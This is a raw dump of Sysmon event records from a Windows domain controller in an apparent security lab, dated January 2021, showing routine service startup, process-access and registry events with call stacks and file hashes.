13:09:44.572{08A6967A-4286-6000-0A00-000000009A01}8442632C:\Windows\system32\services.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.548{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe13.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8A914CFB7496B8461285C009DD8F5627,SHA256=422EC998FED690C2EC3239A4BB80075F098A9A95CBDFFBC873365B9F7136A02A,IMPHASH=DCF866F4139DD7FF6C0A5D4FA050CD7A{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.572{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.572{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.572{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.572{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.572{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.572{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2C00-000000009A01}2748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4286-6000-0A00-000000009A01}8442372C:\Windows\system32\services.exe{08A6967A-4298-6000-3200-000000009A01}2928C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4286-6000-0A00-000000009A01}844932C:\Windows\system32\services.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3100-000000009A01}2248C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4286-6000-0A00-000000009A01}844924C:\Windows\system32\services.exe{08A6967A-4298-6000-3100-000000009A01}2248C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.554{08A6967A-4298-6000-3100-000000009A01}2248C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe10.0.14393.4046Microsoft.ActiveDirectory.WebServicesMicrosoft (R) Windows (R) Operating SystemMicrosoft CorporationMicrosoft.ActiveDirectory.WebServices.exeC:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=868245AE57651C1D8889B528A182C81A,SHA256=2BA73582B4334AEDA469B97D528C24CCB2392FD189524198017D59DF4C4F6504,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:44.556{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x80000000000000001302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:44.556{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x80000000000000001301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4298-6000-3200-000000009A01}2928C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.556{08A6967A-4286-6000-0A00-000000009A01}844936C:\Windows\system32\services.exe{08A6967A-4298-6000-3200-000000009A01}2928C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.554{08A6967A-4298-6000-3200-000000009A01}2928C:\Windows\System32\ismserv.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Intersite Messaging ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationismserv.exeC:\Windows\System32\ismserv.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=39F0EC2CAE7FF38BABDDE2252ACCEA67,SHA256=29BDF4D2040D24E02B830A272D02CF29F19FD4E1A0F54F22BCC76301A0BFD26F,IMPHASH=088F7CD1DAA87B8E05239EDAB00479BB{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0A00-000000009A01}8442400C:\Windows\system32\services.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:44.537{08A6967A-4286-6000-0B00-000000009A01}852892C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 